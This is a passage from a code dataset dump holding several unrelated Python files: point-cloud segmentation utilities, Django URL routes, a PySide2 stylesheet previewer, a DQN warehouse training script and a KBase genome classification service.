allow_0=False,\n output_features=None):\n if train_iteration:\n base_file_name = '_'.join([config.dataset, config.model, 'train_{}'.format(train_iteration)])\n else:\n base_file_name = '_'.join([config.dataset, config.model, 'test'])\n\n # Create directory to save visualization results.\n os.makedirs(config.visualize_path, exist_ok=True)\n\n if refinement_pred is not None and refinement_pred.dim() == 1:\n refinement_pred = refinement_pred[:, None]\n refinement_target = refinement_target[:, None]\n\n # Get filter for valid predictions in the first batch.\n target_batch = (coords[:, 0] == 0).cpu()\n input_xyz = coords[:, 1:]\n target_valid = torch.ne(target, config.ignore_label)\n batch_ids = torch.logical_and(target_batch, target_valid)\n target_nonpred = torch.logical_and(target_batch, ~target_valid) # type: torch.Tensor\n ptc_nonpred = np.hstack(\n (input_xyz[target_nonpred].cpu().numpy(), np.zeros((torch.sum(target_nonpred).item(), 3)))) # type: np.ndarray\n ptc_nonpred_np = np.hstack(\n (input_xyz[target_nonpred].cpu().numpy(), np.zeros((torch.sum(target_nonpred).item(), 1)))) # type: np.ndarray\n\n scaled_input_cords = coords[:, 1:].int()\n input_target_batch = coords[:, 0] == 0 # type: torch.Tensor\n scaled_input_feats = (colors + 0.5) * 255.\n scaled_input_feats = scaled_input_feats.int() # type: torch.Tensor\n\n # Predcited label visualization in RGB.\n input_xyz_np = input_xyz[batch_ids].cpu().numpy()\n xyzlabel = colorize_pointcloud(input_xyz_np, prediction[batch_ids.numpy()], num_labels) # type: np.ndarray\n xyzlabel_np_pred = np.hstack((input_xyz_np, prediction[batch_ids.numpy()][:, None])) # type: np.ndarray\n xyzlabel = np.vstack((xyzlabel, ptc_nonpred)) # type: np.ndarray\n xyzlabel_np_pred = np.vstack((xyzlabel_np_pred, ptc_nonpred_np)) # type: np.ndarray\n filename_pred = '_'.join([base_file_name, 'pred', '%04d.ply' % iteration])\n if refinement_pred is not None:\n refinement = refinement_pred.cpu().numpy()[batch_ids]\n refinement_nonpred = refinement_pred.cpu().numpy()[target_nonpred]\n refinement = np.vstack((refinement, refinement_nonpred))\n xyzlabel = np.hstack((xyzlabel, refinement))\n save_point_cloud(xyzlabel, os.path.join(config.visualize_path, filename_pred), with_refinement=True, verbose=False)\n\n # RGB input values visualization.\n xyzrgb = torch.hstack(\n (scaled_input_cords[input_target_batch], scaled_input_feats[:, :3][input_target_batch])) # type: torch.Tensor\n filename = '_'.join([base_file_name, 'rgb', '%04d.ply' % iteration])\n save_point_cloud(xyzrgb.cpu().numpy(), os.path.join(config.visualize_path, filename), verbose=False)\n\n # Ground-truth visualization in RGB.\n xyzgt = colorize_pointcloud(input_xyz_np, target.numpy()[batch_ids], num_labels) # type: np.ndarray\n xyzgt_np = np.hstack((input_xyz_np, np.expand_dims(target.numpy()[batch_ids], axis=1))) # type: np.ndarray\n\n xyzgt = np.vstack((xyzgt, ptc_nonpred)) # type: np.ndarray\n xyzgt_np = np.vstack((xyzgt_np, ptc_nonpred_np)) # type: np.ndarray\n if refinement_pred is not None:\n refinement = refinement_target.cpu().numpy()[batch_ids]\n refinement_nonpred = refinement_target.cpu().numpy()[target_nonpred]\n refinement = np.vstack((refinement, refinement_nonpred))\n xyzgt = np.hstack((xyzgt, refinement))\n filename = '_'.join([base_file_name, 'gt', '%04d.ply' % iteration])\n save_point_cloud(xyzgt, os.path.join(config.visualize_path, filename), with_refinement=True, verbose=False)\n\n # Finally save confusion matrix\n valid_targets = xyzgt_np[:, -1] != 0 if not allow_0 else xyzgt_np[:, -1] == xyzgt_np[:, -1]\n confusion_matrix = sklearn.metrics.confusion_matrix(xyzgt_np[valid_targets, -1],\n xyzlabel_np_pred[valid_targets, -1], labels=valid_labels)\n filename_conf = '_'.join([base_file_name, 'confusion', '%04d.pkl' % iteration])\n confusion_pkl = {'scene_name': scene_name, 'confusion_mat': confusion_matrix}\n save_obj(os.path.join(config.visualize_path, filename_conf), confusion_pkl)\n\n if save_npy:\n filename_pred_np = '_'.join([base_file_name, 'pred', '%04d.npy' % iteration])\n np.save(os.path.join(config.visualize_path, filename_pred_np), xyzlabel_np_pred)\n filename_np = '_'.join([base_file_name, 'gt', '%04d.npy' % iteration])\n np.save(os.path.join(config.visualize_path, filename_np), xyzgt_np)\n\n if refinement_pred is not None and refinement_target is not None:\n filename_pred_refinement_np = '_'.join([base_file_name, 'pred_refinement', '%04d.npy' % iteration])\n np.save(os.path.join(config.visualize_path, filename_pred_refinement_np), refinement_pred.cpu().numpy())\n filename_target_refinement_np = '_'.join([base_file_name, 'gt_refinement', '%04d.npy' % iteration])\n np.save(os.path.join(config.visualize_path, filename_target_refinement_np), refinement_target.cpu().numpy())\n\n if output_features is not None:\n filename_features_np = '_'.join([base_file_name, 'final_feats', scene_name[0]])\n np.save(os.path.join(config.visualize_path, filename_features_np), output_features.cpu().numpy())\n\n\ndef save_target_freqs(freqs_dict, target_sum_losses, features_dict, iteration, config):\n\n base_file_name = '_'.join([config.dataset, config.model, 'train_{}'.format(iteration), \"target_frequencies.pkl\"])\n losses_file_name = '_'.join([config.dataset, config.model, 'train_{}'.format(iteration), \"mean_losses_by_targets.pkl\"])\n features_file_name = '_'.join([config.dataset, config.model, 'train_{}'.format(iteration), \"sampled_cat_features.pkl\"])\n\n # Create directory to save visualization results.\n os.makedirs(config.visualize_path, exist_ok=True)\n\n # Normalize losses to mean\n if target_sum_losses is not None:\n for cat, l in target_sum_losses.items():\n target_sum_losses[cat] = (target_sum_losses[cat] / freqs_dict[cat]).cpu().numpy()\n full_losses_path = os.path.join(config.visualize_path, losses_file_name)\n with open(full_losses_path, 'wb') as f:\n pickle.dump(target_sum_losses, f, pickle.HIGHEST_PROTOCOL)\n\n if freqs_dict is not None:\n full_path = os.path.join(config.visualize_path, base_file_name)\n with open(full_path, 'wb') as f:\n pickle.dump(freqs_dict, f, pickle.HIGHEST_PROTOCOL)\n\n if features_dict is not None:\n full_features_path = os.path.join(config.visualize_path, features_file_name)\n with open(full_features_path, 'wb') as f:\n pickle.dump(features_dict, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef save_feature_maps(feature_maps, config, scene_name, targets=None, coords=None):\n\n base_file_name = '_'.join([scene_name, \"feature_maps.pkl\"])\n # Create directory to save visualization results.\n os.makedirs(config.visualize_path, exist_ok=True)\n\n out_dict = {'feature_map': feature_maps}\n if targets is not None:\n out_dict = {'target': targets, **out_dict}\n\n if coords is not None:\n out_dict = {'coords': coords, **out_dict}\n\n base_file_name = os.path.join(config.visualize_path, base_file_name)\n with open(base_file_name, 'wb') as f:\n pickle.dump(out_dict, f, pickle.HIGHEST_PROTOCOL)\n\ndef save_mean_features(mean_features, iteration, config):\n\n base_file_name = '_'.join([config.dataset, config.model, 'train_{}'.format(iteration), \"mean_features.pkl\"])\n\n # Create directory to save visualization results.\n os.makedirs(config.visualize_path, exist_ok=True)\n\n full_path = os.path.join(config.visualize_path, base_file_name)\n with open(full_path, 'wb') as f:\n pickle.dump(mean_features, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef map_to_orig_labels(parent_labels, child_labels, parent_mapping, child_mapping,\n supercat_labels=None, supercat_mapping=None):\n parent_mapper = lambda t: parent_mapping[t]\n child_mapper = lambda t: child_mapping[t]\n\n parent_labels.apply_(parent_mapper)\n child_labels.apply_(child_mapper)\n\n if supercat_labels is not None and supercat_mapping is not None:\n supercat_mapper = lambda t: supercat_mapping[t]\n supercat_labels.apply_(supercat_mapper)\n\n return supercat_labels, parent_labels, child_labels\n\n else:\n return parent_labels, child_labels\n\n\ndef orig2general(labels, mapping):\n mapper = lambda t: mapping[t]\n labels.apply_(mapper)\n\n return labels\n\n\ndef permute_pointcloud(input_coords, pointcloud, transformation, label_map,\n voxel_output, voxel_pred):\n \"\"\"Get permutation from pointcloud to input voxel coords.\"\"\"\n\n def _hash_coords(coords, coords_min, coords_dim):\n return np.ravel_multi_index((coords - coords_min).T, coords_dim)\n\n # Validate input.\n input_batch_size = input_coords[:, -1].max().item()\n pointcloud_batch_size = pointcloud[:, -1].max().int().item()\n transformation_batch_size = transformation[:, -1].max().int().item()\n assert input_batch_size == pointcloud_batch_size == transformation_batch_size\n pointcloud_permutation, pointcloud_target = [], []\n\n # Process each batch.\n for i in range(input_batch_size + 1):\n # Filter batch from the data.\n input_coords_mask_b = input_coords[:, -1] == i\n input_coords_b = (input_coords[input_coords_mask_b])[:, :-1].numpy()\n pointcloud_b = pointcloud[pointcloud[:, -1] == i, :-1].numpy()\n transformation_b = transformation[i, :-1].reshape(4, 4).numpy()\n # Transform original pointcloud to voxel space.\n original_coords1 = np.hstack((pointcloud_b[:, :3], np.ones((pointcloud_b.shape[0], 1))))\n original_vcoords = np.floor(original_coords1 @ transformation_b.T)[:, :3].astype(int)\n # Hash input and voxel coordinates to flat coordinate.\n vcoords_all = np.vstack((input_coords_b, original_vcoords))\n vcoords_min = vcoords_all.min(0)\n vcoords_dims = vcoords_all.max(0) - vcoords_all.min(0) + 1\n input_coords_key = _hash_coords(input_coords_b, vcoords_min, vcoords_dims)\n original_vcoords_key = _hash_coords(original_vcoords, vcoords_min, vcoords_dims)\n # Query voxel predictions from original pointcloud.\n key_to_idx = dict(zip(input_coords_key, range(len(input_coords_key))))\n pointcloud_permutation.append(\n np.array([key_to_idx.get(i, -1) for i in original_vcoords_key]))\n pointcloud_target.append(pointcloud_b[:, -1].astype(int))\n pointcloud_permutation = np.concatenate(pointcloud_permutation)\n # Prepare pointcloud permutation array.\n pointcloud_permutation = torch.from_numpy(pointcloud_permutation)\n permutation_mask = pointcloud_permutation >= 0\n permutation_valid = pointcloud_permutation[permutation_mask]\n # Permute voxel output to pointcloud.\n pointcloud_output = torch.zeros(pointcloud.shape[0], voxel_output.shape[1]).to(voxel_output)\n pointcloud_output[permutation_mask] = voxel_output[permutation_valid]\n # Permute voxel prediction to pointcloud.\n # NOTE: Invalid points (points found in pointcloud but not in the voxel) are mapped to 0.\n pointcloud_pred = torch.ones(pointcloud.shape[0]).int().to(voxel_pred) * 0\n pointcloud_pred[permutation_mask] = voxel_pred[permutation_valid]\n # Map pointcloud target to respect dataset IGNORE_LABELS\n pointcloud_target = torch.from_numpy(\n np.array([label_map[i] for i in np.concatenate(pointcloud_target)])).int()\n return pointcloud_output, pointcloud_pred, pointcloud_target\n\n\ndef nanmean_t(torch_array):\n value = torch_array[~torch.isnan(torch_array)].mean().item()\n if np.isnan(value):\n return 0.\n else:\n return value\n\n\ndef print_info(iteration,\n max_iteration,\n losses=None,\n scores=None,\n ious=None,\n hist=None,\n ap_class=None,\n class_names=None,\n dataset_frequency_cats=None):\n debug_str = \"{}/{}: \".format(iteration, max_iteration)\n\n acc = (hist.diagonal() / hist.sum(1) * 100)\n debug_str += \"\\tAVG Loss {loss:.3f}\\t\" \\\n \"AVG Score {top1:.3f}\\t\" \\\n \"mIOU {mIOU:.3f} mAP {mAP:.3f} mAcc {mAcc:.3f}\\n\".format(\n loss=losses.item(), top1=scores.item(), mIOU=np.nanmean(ious),\n mAP=np.nanmean(ap_class), mAcc=np.nanmean(acc))\n\n if dataset_frequency_cats is not None:\n debug_str += 'Head mIoU {head:.3f} \\t Common mIoU {common:.3f} \\tTail mIoU {tail:.3f} \\n'.format(head=np.nanmean(ious[dataset_frequency_cats[:, 0]]),\n common=np.nanmean(ious[dataset_frequency_cats[:, 1]]),\n tail=np.nanmean(ious[dataset_frequency_cats[:, 2]]))\n\n if class_names is not None:\n debug_str += \"\\nClasses: \" + \", \".join(class_names) + '\\n'\n debug_str += 'IOU: ' + ', '.join('{:.03f}'.format(i) for i in ious) + '\\n'\n debug_str += 'mAP: ' + ', '.join('{:.03f}'.format(i) for i in ap_class) + '\\n'\n debug_str += 'mAcc: ' + ', '.join('{:.03f}'.format(i) for i in acc) + '\\n'\n\n logging.info(debug_str)","repo_name":"RozDavid/LanguageGroundedSemseg","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":24777,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"31"} +{"seq_id":"18845191020","text":"from django.urls import path\n\nfrom .views import UserController, DataController\n\nurlpatterns = [\n path(\"login-page/\", UserController.login_view, name=\"login-page\"),\n path(\"signup-page/\", UserController.register_view, name=\"signup-page\"),\n path(\"signup-user/\", UserController.register_user, name=\"signup-new-user\"),\n path(\"send-otp-email/\", UserController.send_email_otp, name=\"send-otp-email\"),\n path(\"verify-otp-page/\", UserController.verify_otp_view, name=\"verify-otp-page\"),\n path(\"verify-otp/\", UserController.verify_otp, name=\"verify-otp\"),\n path(\"home-page/\", DataController.home_page, name=\"home-page\"),\n path(\"search-results/\", DataController.search_results, name=\"search-results\"),\n path(\"country-details/\", DataController.get_country_details, name=\"country-details\"),\n]\n","repo_name":"gauravpore/gforce-app-doqfy-task","sub_path":"gforce/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42107969391","text":"from . import PySide2StyleTestWidget as _PySide2StyleTestWidget\nfrom . import __version__, CommandLineError\nfrom PySide2.QtWidgets import QApplication\n\nimport argparse\nimport sys\n\n\ndef main(*argv, test_widget=_PySide2StyleTestWidget):\n\t\"\"\"The main application of this library. Made available as a function\n\tfor other scripts to extend it's function.\n\n\tArgs:\n\t\t*argv: The command line arguments to supply to the program supplied as\n\t\t\tstrings. If this is empty, `sys.argv` is used.\n\t\ttest_widget (:obj:`QWidget`, optional): Any PySide2 compliant widget\n\t\t\tthat will be used as the main display window once the program is\n\t\t\tinitalized. By default this is an instance of `PySide2StyleTestWidget`.\n\t\"\"\"\n\t# NOTE:\n\t# \tEven though this won't be using any alternative UIs I'm going to\n\t#\twrite it as if there will be one. Just so it's done and I can\n\t#\tcopy and paste this code elsewhere if I want to.\n\n\t# Init qt-app as global so it can be used to parse arguments and collect\n\t# opperational data which can be used by other UI implementations.\n\tqt_application = QApplication(list(*argv) if len(argv) else sys.argv)\n\tqt_application.setApplicationName(\"pyside2-style-test\")\n\tqt_application.setApplicationVersion(__version__)\n\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"\"\"A QSS preview script.\"\"\",\n\t\tepilog=\"\"\"NOTE: if specifying a stylesheet via the command line using\n\t\tthe --stylesheet option, be aware that it will be overriden by whatever\n\t\tstylesheet you load after the file prompt or by the positional argument.\n\t\tOne of which is required for the program to run.\"\"\"\n\t)\n\tparser.add_argument(\"--file\",\n\t\thelp=\"the stylesheet you want to test\",\n\t\trequired=True,\n\t)\n\n\targuments = parser.parse_args(qt_application.arguments()[1:])\n\n\tGUI = test_widget(arguments.file)\n\tGUI.show()\n\n\t# Hand off control of signal processing to Qt. This function is\n\t# blocking and only returns when the user exits from the GUI.\n\t#\n\t# XXX:\n\t#\t(ONLY APPLIES TO MULTITHREADING AND THE REFS ARE ONLY\n\t#\tINACCESSABLE INSIDE THE ASYNC FUNCTIONS)\n\t#\n\t#\tThis function must be called within the function that initializes\n\t#\tall our graphical elements. Otherwise their references are destroyed\n\t#\tby the trash collector and any other threads we made using those\n\t#\twill crash.\n\tqt_application.exec_()\n\n\ndef _main():\n\t\"\"\"Main function alias for command line setuptools script\"\"\"\n\tmain(sys.argv)\n\tsys.exit()\n","repo_name":"M3TIOR/pyside2-style-test","sub_path":"pyside2_style_test/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16412685886","text":"import random\nimport math\nimport time\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten\nfrom tensorflow.keras.optimizers import Adam\nimport huskarl as hk\n\nimport matplotlib.pyplot as plt\n\nfrom warehouse_env.warehouse import WarehouseEnv\n\n\nclass EpsDecay(hk.policy.Policy):\n def __init__(self, eps_min, steps):\n self.eps = 1.0\n self.eps_min = eps_min\n self.eps_decay = math.pow(self.eps_min, 1 / steps)\n self.step = 0\n\n def act(self, qvals):\n if self.eps > self.eps_min:\n self.eps *= self.eps_decay\n\n if self.step % 1000 == 0:\n print(self.eps)\n self.step += 1\n\n if random.random() > self.eps:\n return np.argmax(qvals)\n return random.randrange(len(qvals))\n\n\nif __name__ == \"__main__\":\n env_layout = \"layout2-2bins.yml\"\n # Training Parameters\n lr = 1e-3\n eps_min = 0.1\n eps_steps = 20_000 # 40_000\n memsize = 20_000 # 20_000\n gamma = 0.95\n target_update = 100\n\n def create_env():\n return WarehouseEnv(env_layout)\n\n warehouse_env = create_env()\n\n optimizer = Adam(lr=lr)\n model = Sequential()\n model.add(\n Conv2D(\n 32, 3, activation=\"relu\", input_shape=warehouse_env.observation_space.shape\n )\n )\n model.add(Flatten())\n model.add(Flatten(input_shape=warehouse_env.observation_space.shape))\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dense(32, activation=\"relu\"))\n model.add(Dense(warehouse_env.action_space.n, activation=\"linear\"))\n\n # print model info\n model.summary()\n\n # Create Deep Q-Learning Network agent\n\n eps_policy = EpsDecay(eps_min, eps_steps)\n\n agent = hk.agent.DQN(\n model,\n actions=warehouse_env.action_space.n,\n nsteps=1,\n gamma=gamma,\n memsize=memsize,\n policy=eps_policy,\n target_update=target_update,\n )\n\n def plot_rewards(episode_rewards, episode_steps, done=False):\n plt.clf()\n plt.xlabel(\"Step\")\n plt.ylabel(\"Reward\")\n plt.title(\n f\"Bin-Slot-Size: {warehouse_env.layout['bin-slot-size']}, LR: {lr}, Eps-min: {eps_min} (in {eps_steps} Steps), gamma: {gamma}, memsize: {memsize}, t-update: {target_update}\"\n )\n for ed, steps in zip(episode_rewards, episode_steps):\n plt.plot(steps, ed)\n plt.show() if done else plt.pause(\n 0.001\n ) # Pause a bit so that the graph is updated\n\n # Create simulation, train and then test\n sim = hk.Simulation(create_env, agent)\n\n sim.train(max_steps=20_000, visualize=False, plot=plot_rewards)\n\n filename = f\"32CDDD-{warehouse_env.layout['bin-slot-size']}slotsA.h5\"\n agent.save(filename)\n\n agent.model.load_weights(filename)\n\n print(\"### TESTING ###\")\n agent.training = False\n env = WarehouseEnv(env_layout)\n state = env.reset()\n\n steps = []\n episodes = 100\n max_steps = 100\n json_vis = { \"initial\": state, \"episodes\": []}\n for e in range(episodes):\n for i in range(max_steps):\n action = agent.act(state)\n next_state, rewards, done, info = env.step(action)\n if np.array_equal(state, next_state):\n i = max_steps\n break\n state = next_state\n env.render()\n time.sleep(0.2)\n if done:\n break\n state = env.reset(assertions=False)\n steps.append(i +1)\n \n # sim.test(max_steps=1000)\n\n print (f\"{len([1 for s in steps if s < max_steps])}/{episodes} episode succeeded.\")\n","repo_name":"BlacCello/warehouse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3424502479","text":"# -*- coding: utf-8 -*-\n#BEGIN_HEADER\n# The header block is where all import statments should live\n\nimport os\n\nfrom biokbase.workspace.client import Workspace as workspaceService\nfrom kb_genomeclassification.Util.kb_genomeclfUtils import kb_genomeclfUtils\n\n#END_HEADER\n\n\nclass kb_genomeclassification:\n '''\n Module Name:\n kb_genomeclassification\n\n Module Description:\n A KBase module: kb_genomeclassification\nThis module build a classifier and predict phenotypes based on the classifier Another line\n '''\n\n ######## WARNING FOR GEVENT USERS ####### noqa\n # Since asynchronous IO can lead to methods - even the same method -\n # interrupting each other, you must be *very* careful when using global\n # state. A method could easily clobber the state set by another while\n # the latter method is running.\n ######################################### noqa\n VERSION = \"0.0.1\"\n GIT_URL = \"https://github.com/sagoyal2/kb_genomeclassification.git\"\n GIT_COMMIT_HASH = \"d7f43fbbea9bf1d87fec3132a97f42a9b70d10c9\"\n\n #BEGIN_CLASS_HEADER\n\n #END_CLASS_HEADER\n\n # config contains contents of config file in a hash or None if it couldn't\n # be found\n def __init__(self, config):\n #BEGIN_CONSTRUCTOR\n\n self.config = config\n\n self.workspaceURL = config.get('workspace-url')\n self.scratch = os.path.abspath(config.get('scratch'))\n self.callback_url = os.environ['SDK_CALLBACK_URL']\n self.ws_client = workspaceService(self.workspaceURL)\n\n self.config['workspaceURL'] = self.workspaceURL\n self.config['scratch'] = self.scratch\n self.config['callback_url'] = self.callback_url\n\n #END_CONSTRUCTOR\n pass\n\n\n def build_classifier(self, ctx, params):\n \"\"\"\n build_classifier: build_classifier\n requried params:\n :param params: instance of type \"BuildClassifierInput\" -> structure:\n parameter \"genome_attribute\" of String, parameter \"workspace\" of\n String, parameter \"training_set_name\" of String, parameter\n \"classifier_training_set\" of mapping from String to type\n \"ClassifierTrainingSet\" -> structure: parameter \"phenotype\" of\n String, parameter \"genome_name\" of String, parameter\n \"classifier_object_name\" of String, parameter \"description\" of\n String, parameter \"classifier_to_run\" of String, parameter\n \"logistic_regression\" of type \"LogisticRegressionOptions\" ->\n structure: parameter \"penalty\" of String, parameter \"dual\" of type\n \"boolean\" (\"True\" or \"False\"), parameter \"lr_tolerance\" of Double,\n parameter \"lr_C\" of Double, parameter \"fit_intercept\" of type\n \"boolean\" (\"True\" or \"False\"), parameter \"intercept_scaling\" of\n Double, parameter \"lr_class_weight\" of String, parameter\n \"lr_random_state\" of Long, parameter \"lr_solver\" of String,\n parameter \"lr_max_iter\" of Long, parameter \"multi_class\" of\n String, parameter \"lr_verbose\" of type \"boolean\" (\"True\" or\n \"False\"), parameter \"lr_warm_start\" of Long, parameter \"lr_n_jobs\"\n of Long, parameter \"decision_tree_classifier\" of type\n \"DecisionTreeClassifierOptions\" -> structure: parameter\n \"criterion\" of String, parameter \"splitter\" of String, parameter\n \"max_depth\" of Long, parameter \"min_samples_split\" of Long,\n parameter \"min_samples_leaf\" of Long, parameter\n \"min_weight_fraction_leaf\" of Double, parameter \"max_features\" of\n String, parameter \"dt_random_state\" of Long, parameter\n \"max_leaf_nodes\" of Long, parameter \"min_impurity_decrease\" of\n Double, parameter \"dt_class_weight\" of String, parameter \"presort\"\n of String, parameter \"gaussian_nb\" of type \"GaussianNBOptions\" ->\n structure: parameter \"priors\" of String, parameter\n \"k_nearest_neighbors\" of type \"KNearestNeighborsOptions\" ->\n structure: parameter \"n_neighbors\" of Long, parameter \"weights\" of\n String, parameter \"algorithm\" of String, parameter \"leaf_size\" of\n Long, parameter \"p\" of Long, parameter \"metric\" of String,\n parameter \"metric_params\" of String, parameter \"knn_n_jobs\" of\n Long, parameter \"support_vector_machine\" of type\n \"SupportVectorMachineOptions\" -> structure: parameter \"svm_C\" of\n Double, parameter \"kernel\" of String, parameter \"degree\" of Long,\n parameter \"gamma\" of String, parameter \"coef0\" of Double,\n parameter \"probability\" of type \"boolean\" (\"True\" or \"False\"),\n parameter \"shrinking\" of type \"boolean\" (\"True\" or \"False\"),\n parameter \"svm_tolerance\" of Double, parameter \"cache_size\" of\n Double, parameter \"svm_class_weight\" of String, parameter\n \"svm_verbose\" of type \"boolean\" (\"True\" or \"False\"), parameter\n \"svm_max_iter\" of Long, parameter \"decision_function_shape\" of\n String, parameter \"svm_random_state\" of Long, parameter\n \"neural_network\" of type \"NeuralNetworkOptions\" -> structure:\n parameter \"hidden_layer_sizes\" of String, parameter \"activation\"\n of String, parameter \"mlp_solver\" of String, parameter \"alpha\" of\n Double, parameter \"batch_size\" of String, parameter\n \"learning_rate\" of String, parameter \"learning_rate_init\" of\n Double, parameter \"power_t\" of Double, parameter \"mlp_max_iter\" of\n Long, parameter \"shuffle\" of type \"boolean\" (\"True\" or \"False\"),\n parameter \"mlp_random_state\" of Long, parameter \"mlp_tolerance\" of\n Double, parameter \"mlp_verbose\" of type \"boolean\" (\"True\" or\n \"False\"), parameter \"mlp_warm_start\" of type \"boolean\" (\"True\" or\n \"False\"), parameter \"momentum\" of Double, parameter\n \"nesterovs_momentum\" of type \"boolean\" (\"True\" or \"False\"),\n parameter \"early_stopping\" of type \"boolean\" (\"True\" or \"False\"),\n parameter \"validation_fraction\" of Double, parameter \"beta_1\" of\n Double, parameter \"beta_2\" of Double, parameter \"epsilon\" of\n Double, parameter \"ensemble_model\" of type \"EnsembleModelOptions\"\n -> structure: parameter \"k_nearest_neighbors_box\" of Long,\n parameter \"gaussian_nb_box\" of Long, parameter\n \"logistic_regression_box\" of Long, parameter\n \"decision_tree_classifier_box\" of Long, parameter\n \"support_vector_machine_box\" of Long, parameter\n \"neural_network_box\" of Long, parameter \"voting\" of String,\n parameter \"en_weights\" of String, parameter \"en_n_jobs\" of Long,\n parameter \"flatten_transform\" of type \"boolean\" (\"True\" or \"False\")\n :returns: instance of type \"ClassifierOut\" -> structure: parameter\n \"classifier_info\" of list of type \"classifierInfo\" -> structure:\n parameter \"classifier_name\" of String, parameter \"classifier_ref\"\n of String, parameter \"accuracy\" of Double, parameter \"report_name\"\n of String, parameter \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN build_classifier\n\n self.config['ctx'] = ctx\n build_runner = kb_genomeclfUtils(self.config)\n\n html_output_name, classifier_info_list = build_runner.fullClassify(params, params['workspace'])\n report_output = build_runner.generateHTMLReport(params['workspace'], \"forBuild\", html_output_name, params['description'], for_build_classifier=True)\n output = {'report_name': report_output['name'], 'report_ref': report_output['ref'], 'classifier_info': classifier_info_list}\n #END build_classifier\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method build_classifier return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n\n def predict_phenotype(self, ctx, params):\n \"\"\"\n :param params: instance of type \"ClassifierPredictionInput\" ->\n structure: parameter \"workspace\" of String, parameter\n \"categorizer_name\" of String, parameter \"description\" of String,\n parameter \"file_path\" of String, parameter \"annotate\" of Long\n :returns: instance of type \"ClassifierPredictionOutput\" -> structure:\n parameter \"prediction_set\" of mapping from String to type\n \"PredictedPhenotypeOut\" -> structure: parameter\n \"prediction_probabilities\" of Double, parameter \"phenotype\" of\n String, parameter \"genome_name\" of String, parameter \"genome_ref\"\n of String, parameter \"report_name\" of String, parameter\n \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN predict_phenotype\n self.config['ctx'] = ctx\n predict_Runner = kb_genomeclfUtils(self.config)\n\n html_output_name, prediction_set = predict_Runner.fullPredict(params, params['workspace'])\n report_output = predict_Runner.generateHTMLReport(params['workspace'], \"forPredict\", html_output_name, params['description'])\n output = {'report_name': report_output['name'], 'report_ref': report_output['ref'], 'prediction_set': prediction_set}\n\n #END predict_phenotype\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method predict_phenotype return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n\n def upload_trainingset(self, ctx, params):\n \"\"\"\n :param params: instance of type \"UploadTrainingSetInput\" ->\n structure: parameter \"phenotype\" of String, parameter \"workspace\"\n of String, parameter \"workspace_id\" of String, parameter\n \"description\" of String, parameter \"training_set_name\" of String,\n parameter \"file_path\" of String, parameter \"annotate\" of Long\n :returns: instance of type \"UploadTrainingSetOut\" -> structure:\n parameter \"classifier_training_set\" of mapping from String to type\n \"ClassifierTrainingSetOut\" -> structure: parameter \"phenotype\" of\n String, parameter \"genome_name\" of String, parameter \"genome_ref\"\n of String, parameter \"references\" of list of String, parameter\n \"evidence_types\" of list of String, parameter \"report_name\" of\n String, parameter \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN upload_trainingset\n\n self.config['ctx'] = ctx\n upload_runner = kb_genomeclfUtils(self.config)\n\n html_output_name, classifier_training_set = upload_runner.fullUpload(params, params['workspace'])\n report_output = upload_runner.generateHTMLReport(params['workspace'], \"forUpload\", html_output_name, params['description'])\n output = {'report_name': report_output['name'], 'report_ref': report_output['ref'], 'classifier_training_set': classifier_training_set}\n\n #END upload_trainingset\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method upload_trainingset return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n\n def rast_annotate_trainingset(self, ctx, params):\n \"\"\"\n :param params: instance of type \"RastAnnotateTrainingSetInput\" ->\n structure: parameter \"classifier_training_set\" of mapping from\n String to type \"ClassifierTrainingSetOut\" -> structure: parameter\n \"phenotype\" of String, parameter \"genome_name\" of String,\n parameter \"genome_ref\" of String, parameter \"references\" of list\n of String, parameter \"evidence_types\" of list of String, parameter\n \"workspace\" of String, parameter \"make_genome_set\" of Long\n :returns: instance of type \"RastAnnotateTrainingSetOutput\" ->\n structure: parameter \"classifier_training_set\" of mapping from\n String to type \"ClassifierTrainingSetOut\" -> structure: parameter\n \"phenotype\" of String, parameter \"genome_name\" of String,\n parameter \"genome_ref\" of String, parameter \"references\" of list\n of String, parameter \"evidence_types\" of list of String, parameter\n \"report_name\" of String, parameter \"report_ref\" of String\n \"\"\"\n # ctx is the context object\n # return variables are: output\n #BEGIN rast_annotate_trainingset\n\n self.config['ctx'] = ctx\n annotate_runner = kb_genomeclfUtils(self.config)\n\n html_output_name, classifier_training_set= annotate_runner.fullAnnotate(params, params['workspace'])\n report_output = annotate_runner.generateHTMLReport(params['workspace'], \"forAnnotate\", html_output_name, params['description'])\n output = {'report_name': report_output['name'], 'report_ref': report_output['ref'], 'classifier_training_set': classifier_training_set}\n\n #END rast_annotate_trainingset\n\n # At some point might do deeper type checking...\n if not isinstance(output, dict):\n raise ValueError('Method rast_annotate_trainingset return value ' +\n 'output is not type dict as required.')\n # return the results\n return [output]\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\",\n 'message': \"\",\n 'version': self.VERSION,\n 'git_url': self.GIT_URL,\n 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return 